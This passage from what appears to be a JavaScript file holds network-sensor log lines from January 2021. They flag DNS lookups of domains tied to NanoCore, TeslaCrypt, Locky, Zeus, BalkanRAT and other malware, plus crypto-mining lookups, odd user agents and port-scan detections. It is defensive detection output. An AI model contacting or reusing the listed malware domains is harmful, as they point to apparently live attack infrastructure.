    '"2021-01-11 02:43:10.046552" r2d2 2.200.110.233 65260 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:43:26.116352" r2d2 2.200.110.233 63581 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:43:31.000009" r2d2 2.200.108.59 26244,26248,26249,26255,26257,26258,26263,26264,26265,26266,26268,32796,33576,33924,36090,36458,36554,37694,38078,39516,40010,40564,40718,41130,41210,41211,41213,41218,42012,42280,42488,42656,42810,42908,43048,43282,43890,44358,44836,45066,45814,46152,47332,47333,47335,47337,47338,47339,47340,47570,48204,48936,49520,49764,49876,49958,50206,50806,51076,51796,51896,52234,53024,54098,54234,54244,54262,54670,55436,55758,55844,56052,56766,57368,57864,58344,58498,58846,60296,60348,60486,60564,60620 77.53.81.105 21,5258,6551,7839,8329,8465,8553,8692,9043,11119,13208,14012,15563,16561,16645,18340,18446,19323,19385,20811,21911,25445,25691,26684,27509,28351,28721,29488,31683,32211,34788,36263,39197,39219,39222,39687,39781,40798,45271,48286,48466,48714,48857,49928,50235,51049,52173,53587,54069,56450,57261,57316,57396,57731,58684,60000,60804,61344,61480,63050,63331,64861 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:43:31.000633" r2d2 2.200.108.59 26245,26247,26249,26250,26252,26258,26260,26261,26263,26265,26267,26268,26269,33576,33924,34006,34266,34776,34956,36090,36432,36874,37314,37328,37694,37722,37888,39284,39516,39744,40476,40718,41130,41211,41214,41216,41217,41506,41788,41998,42236,42656,42902,43282,44304,44570,45304,45588,46152,46172,46442,46936,47384,48204,48736,48742,49128,49730,49876,50186,50806,51076,51880,51896,52324,52790,53990,54098,54244,54368,55038,55436,55844,56830,57092,57864,58498,58698,58820,59600,59698,60296,60380,60462,60486,60634 77.53.81.105 21,5875,6405,8465,8692,8960,9047,9052,11622,13208,13541,14012,14367,14682,15563,16561,16821,17658,18001,18340,19323,19385,20536,20975,21164,21480,21735,21743,24543,29405,30149,30591,32483,32509,35178,35463,36024,38031,38220,39103,39219,39781,40798,41190,43348,44080,44655,44763,46543,47150,48058,48496,51049,52241,52247,52956,53587,56410,56450,57261,57731,59254,60000,60563,60804,60806,61344,63050,63331,64861,65147 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:43:31.000558" r2d2 2.200.108.59 26243,26244,26246,26247,26250,26251,26252,26253,26254,26255,26256,26257,26259,26260,26262,26266,34006,34776,36458,36554,36874,37632,38078,39188,40010,40650,41172,41176,41209,41212,41213,41214,41215,41217,41218,41506,41752,41998,42012,42096,42194,42236,42294,42488,42810,42902,43048,43474,44096,44226,44304,44358,44544,45066,45814,45918,46442,46936,47332,47334,47335,47336,47337,47338,47340,47341,47384,47570,48736,48742,49128,49196,49730,49764,49958,50186,50418,51386,51736,51880,51926,53990,54112,54234,54262,55038,55238,55758,56052,56544,56766,56830,57086,57092,58286,58540,58698,58846,59698,60030,60380,60462,60564,60634 77.53.81.105 21,5258,5875,5916,6405,6551,7353,8329,8333,8553,8950,8960,9047,11622,13165,13541,14111,14367,17409,17658,18446,18776,19910,20536,20811,21735,21743,21911,22669,22902,25405,25426,25445,25691,25829,26880,30483,30591,31683,32483,32561,34788,35178,38220,38384,39687,41190,42422,42475,43348,44655,44763,45271,46543,48286,48466,48714,48857,49931,50235,52241,52247,53479,56410,57159,57396,58636,58684,60563,60806,61296,63720,65147,65417 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:43:43.382606" r2d2 2.200.107.146 47601 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:43:43.381128" r2d2 2.200.110.232 63571 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:44:11.548036" r2d2 2.200.105.226 59139 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:44:11.548049" r2d2 2.200.105.226 59139 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:44:11.548033" r2d2 2.200.105.226 59139 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:44:11.579035" r2d2 2.200.105.226 58773 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:44:17.839284" r2d2 2.200.110.232 65192 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:44:17.871322" r2d2 2.200.110.233 63806 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:44:20.049570" r2d2 2.200.110.232 64926 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:44:10.200749" r2d2 178.17.174.14 35872 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; YPC 3.2.0; SV1; GTB7.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:44:20.078743" r2d2 2.200.110.233 65526 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:44:59.610593" r2d2 2.200.110.232 64550 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:44:59.611973" r2d2 2.200.107.146 33660 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:45:27.721348" r2d2 2.200.110.232 64890 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 02:45:27.754766" r2d2 2.200.110.233 49285 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 02:45:30.101618" r2d2 2.200.110.232 64645 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:45:23.419935" r2d2 10.1.19.42 59470 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:45:30.132352" r2d2 2.200.110.233 65172 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:45:31.511488" r2d2 2.200.110.232 65396 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:45:38.385283" r2d2 178.17.174.14 38574 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; BTRS125042; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; eSobiSubscriber 2.0.4.16; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:46:36.040922" r2d2 10.3.160.42 23383 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:46:36.141475" r2d2 10.3.160.42 23383 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:46:36.244617" r2d2 10.3.160.42 23383 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:46:36.444059" r2d2 10.3.160.42 23383 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:46:36.740716" r2d2 10.3.160.42 23383 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:46:37.140605" r2d2 10.3.160.42 23383 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:46:40.133632" r2d2 2.200.110.232 63763 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:46:40.169724" r2d2 2.200.110.233 65330 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:46:43.381383" r2d2 2.200.110.232 49234 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:46:43.382815" r2d2 2.200.107.146 29746 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:46:58.173046" r2d2 178.17.174.14 40958 2.200.109.24 80 TCP UA "Vega (Mozilla/5.0 \\(Linux; Android 5.1.1; Vega S95_Meta Build/p200_2G; wv\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Version/4.0 Chrome/48.0.2564.106 Safari/537.36)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:46:58.173053" r2d2 178.17.174.14 40958 2.200.109.24 80 TCP UA "Vega (Mozilla/5.0 \\(Linux; Android 5.1.1; Vega S95_Meta Build/p200_2G; wv\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Version/4.0 Chrome/48.0.2564.106 Safari/537.36)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:46:58.173051" r2d2 178.17.174.14 40958 2.200.109.24 80 TCP UA "Vega (Mozilla/5.0 \\(Linux; Android 5.1.1; Vega S95_Meta Build/p200_2G; wv\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Version/4.0 Chrome/48.0.2564.106 Safari/537.36)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:47:08.031922" r2d2 2.200.103.194 54413 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:47:07.900157" r2d2 2.200.103.194 54413 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:47:15.574508" r2d2 2.200.110.232 64145 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:47:15.339192" r2d2 178.17.174.14 41436 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MDDS; .NET4.0C; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:47:07.899971" r2d2 2.200.103.194 54413 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:47:43.395662" r2d2 2.200.107.146 26929 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:47:43.393244" r2d2 2.200.110.232 65313 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:47:43.397280" r2d2 2.200.107.146 26766 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:47:43.395263" r2d2 2.200.110.232 65377 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:47:45.770036" r2d2 2.200.97.1 53433 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:47:47.888160" r2d2 2.200.110.233 64029 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:47:44.135571" r2d2 10.44.70.211 51672 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:47:50.181720" r2d2 2.200.110.233 64582 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:47:59.610673" r2d2 2.200.110.232 63985 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:48:03.991912" r2d2 2.200.110.232 49336 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:48:09.620515" r2d2 2.200.105.226 58030 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:48:09.620517" r2d2 2.200.105.226 58030 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:48:09.620507" r2d2 2.200.105.226 58030 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:48:12.663349" r2d2 178.17.174.14 43136 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; BOIE8;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:48:25.126852" r2d2 2.200.110.232 65478 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:48:25.128380" r2d2 2.200.107.146 10038 46.101.179.64 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:48:31.223369" r2d2 10.1.81.47 65520 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:48:31.226645" r2d2 2.200.107.146 54402 173.245.59.41 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:48:42.841466" r2d2 10.1.19.42 59472 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:48:59.621396" r2d2 2.200.110.232 64299 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:48:59.623315" r2d2 2.200.107.146 45420 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:49:00.190542" r2d2 2.200.110.233 64650 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:49:29.681630" r2d2 178.17.174.14 47414 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/31.0.1650.57; .NET CLR 2.0.50727; IE0006_ver1;EN_US\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:49:29.681627" r2d2 178.17.174.14 47414 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; chromeframe/31.0.1650.57; .NET CLR 2.0.50727; IE0006_ver1;EN_US\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:49:43.382151" r2d2 2.200.110.232 64270 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:49:43.383935" r2d2 2.200.107.146 33656 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:49:40.026339" r2d2 178.17.174.14 48030 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:50:10.271435" r2d2 2.200.107.146 65398 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:50:10.269955" r2d2 2.200.110.232 64522 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:50:10.306614" r2d2 2.200.110.233 63360 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:50:36.420646" r2d2 10.3.160.42 23385 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:50:36.520573" r2d2 10.3.160.42 23385 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:50:36.622361" r2d2 10.3.160.42 23385 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:50:56.432645" r2d2 10.1.19.42 59494 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:50:59.610102" r2d2 2.200.107.146 22314 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:50:59.608660" r2d2 2.200.110.232 64520 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:50:59.624050" r2d2 2.200.110.232 65123 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:50:59.645978" r2d2 2.200.107.146 1110 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:51:15.131521" r2d2 2.200.110.232 64439 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 02:51:15.157790" r2d2 2.200.110.233 63345 2.200.107.169 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 02:51:15.159244" r2d2 2.200.107.146 40854 199.249.113.1 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 02:51:17.914466" r2d2 2.200.110.233 63545 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:51:20.313257" r2d2 2.200.110.232 64041 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:51:20.314587" r2d2 2.200.107.146 63949 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:51:20.344977" r2d2 2.200.110.233 65357 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:51:54.474998" r2d2 2.200.110.233 64906 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:51:59.608303" r2d2 2.200.110.232 65421 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:51:59.609754" r2d2 2.200.107.146 34343 199.249.120.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:52:27.936503" r2d2 2.200.110.233 49337 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:52:27.938218" r2d2 2.200.107.146 18153 173.201.73.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:52:27.957495" r2d2 2.200.110.233 64885 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:52:29.148253" r2d2 2.200.110.233 63415 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:52:29.150368" r2d2 2.200.107.146 45387 45.175.22.4 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:52:30.344644" r2d2 2.200.110.232 49315 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:52:30.345988" r2d2 2.200.107.146 28873 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:52:36.610243" r2d2 10.3.160.42 23386 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:52:36.710004" r2d2 10.3.160.42 23386 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:52:36.813080" r2d2 10.3.160.42 23386 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:52:37.006314" r2d2 2.200.107.146 29058 193.232.156.17 53 UDP DNS (0nline-cinema).org.ru "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:52:37.009951" r2d2 10.3.160.42 23386 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:52:37.314001" r2d2 10.3.160.42 23386 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:52:37.709881" r2d2 10.3.160.42 23386 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:52:43.381963" r2d2 2.200.110.232 49260 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:52:46.093044" r2d2 2.200.97.1 59069 8.8.8.8 53 UDP DNS checkip.dyndns.com "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:53:31.000446" r2d2 2.200.108.59 26637,26638,26642,26643,26645,26649,26650,26656,26659,26660,26661,26666,26670,32832,33206,33242,33448,33510,33688,33846,34400,34530,34616,34870,34886,35046,35122,35236,35404,35420,35434,35674,35886,36586,36860,37368,37996,38082,38592,38692,39302,41368,41425,41427,41428,41429,41430,41550,42822,44010,44492,45270,45534,45674,46086,46548,46564,46612,46630,46820,47529,47531,47874,48062,48440,48484,48836,49254,49504,49736,49750,50374,51368,51482,51644,51778,51962,52562,53052,53854,53996,54028,54402,54494,54610,55096,55246,56182,56308,57220,57646,57828,57908,58192,58284,58352,58878,59056,59210 77.53.81.105 21,6027,6076,6986,8583,8711,9287,9612,9842,9892,9941,10153,10216,11104,13544,15375,18027,18092,18412,19338,19674,20059,20104,20395,20833,21584,21974,23763,23880,24632,24971,25689,27821,27921,28819,29338,29521,29636,29645,29891,30362,31317,32515,32909,33243,34327,35486,36295,36698,37628,38849,39022,39193,41859,42896,43647,44236,46022,46559,47402,47679,48750,49558,49888,50880,54293,54688,55325,55753,55783,55972,56579,57983,58681,58979,59883,60149,62163,62240,62456,64289 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:53:37.567934" r2d2 2.200.107.146 42272 192.43.172.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:53:37.566360" r2d2 2.200.110.232 64103 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:53:37.609943" r2d2 2.200.110.233 63977 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:53:32.000698" r2d2 2.200.108.59 26647,26648,26651,26653,26654,26656,26657,26658,26659,26662,26664,26669,26670,32912,33144,33448,35190,35404,35888,36586,37418,37566,37670,38092,38362,39150,39170,39302,39582,39658,39798,40580,40782,40922,41370,41430,41431,41984,41986,42254,42418,43964,44010,44364,44478,45270,45674,46038,46086,46330,46820,47038,47164,47340,47532,48440,48484,49504,49564,49914,51644,51828,51962,52928,52936,53430,53960,54402,55004,55246,57368,57646,57794,57908,58878,59210,60014,60294 77.53.81.105 21,5244,5654,6925,8448,8583,8711,8738,9687,9842,10153,10216,10418,10834,10959,11311,11595,13544,18173,18415,18970,19508,21210,21584,23880,24432,24971,26395,27697,27821,27921,31472,32393,32515,34327,35622,38518,39851,41859,43373,44197,44404,44628,44635,46261,46424,47679,49558,49888,51041,51421,52463,52883,53521,54054,54293,55325,55753,55783,59507,59684,60176,60291,64030 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:53:37.885625" r2d2 2.200.110.233 49270 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:53:38.798198" r2d2 2.200.110.233 64066 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:53:32.000563" r2d2 2.200.108.59 26648,26651,26653,26654,26655,26661,26662,26664,26665,26668,26669,32912,33144,33846,33928,34554,34850,35046,35190,35236,35434,35674,35888,35892,35934,36860,36876,36924,37418,38092,38692,38694,39150,39302,39582,39658,40580,40782,41058,41282,41368,41429,42212,42220,42254,42418,42802,42810,44010,46038,46294,46630,46762,47164,47529,47532,47533,47874,48062,49254,49396,49736,49750,49908,49914,51028,51164,51368,52198,52928,52936,53052,53430,53854,53960,54028,54494,54610,54744,54756,55096,55312,55378,55950,58804,59056,59446,60014,60420 77.53.81.105 21,5654,6076,6271,6892,6925,6986,7078,8448,8738,9006,9072,9287,9687,9892,9941,10409,10858,11311,11884,12831,13100,13242,18027,18173,18415,18683,18970,20320,21210,23763,24432,24433,24518,25033,26214,26943,27603,27697,29636,29891,30362,32658,32692,33243,33809,35486,36295,36422,38518,40075,40591,42896,44197,44236,44628,44635,44644,46022,48374,48750,51421,52463,52883,53654,54631,54688,55972,58423,58681,58979,59507,60291,63054,64289 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:53:40.396326" r2d2 2.200.110.232 65455 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:53:40.398631" r2d2 2.200.107.146 50644 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:53:40.437809" r2d2 2.200.110.233 64292 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:53:41.549791" r2d2 2.200.110.233 64687 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:53:43.394214" r2d2 2.200.110.232 63663 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:53:53.537817" r2d2 2.200.109.50 62205 8.8.8.8 53 UDP DNS (vast.yomeno).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:53:59.608127" r2d2 2.200.110.232 65308 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:53:59.625291" r2d2 2.200.110.232 65443 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:53:59.627807" r2d2 2.200.107.146 50482 192.33.14.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:54:02.032356" r2d2 2.200.110.232 63923 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:54:02.033865" r2d2 2.200.107.146 27977 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:54:02.079372" r2d2 2.200.110.233 65088 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:54:15.120619" r2d2 10.1.19.42 59496 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:54:43.397054" r2d2 2.200.110.232 64312 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
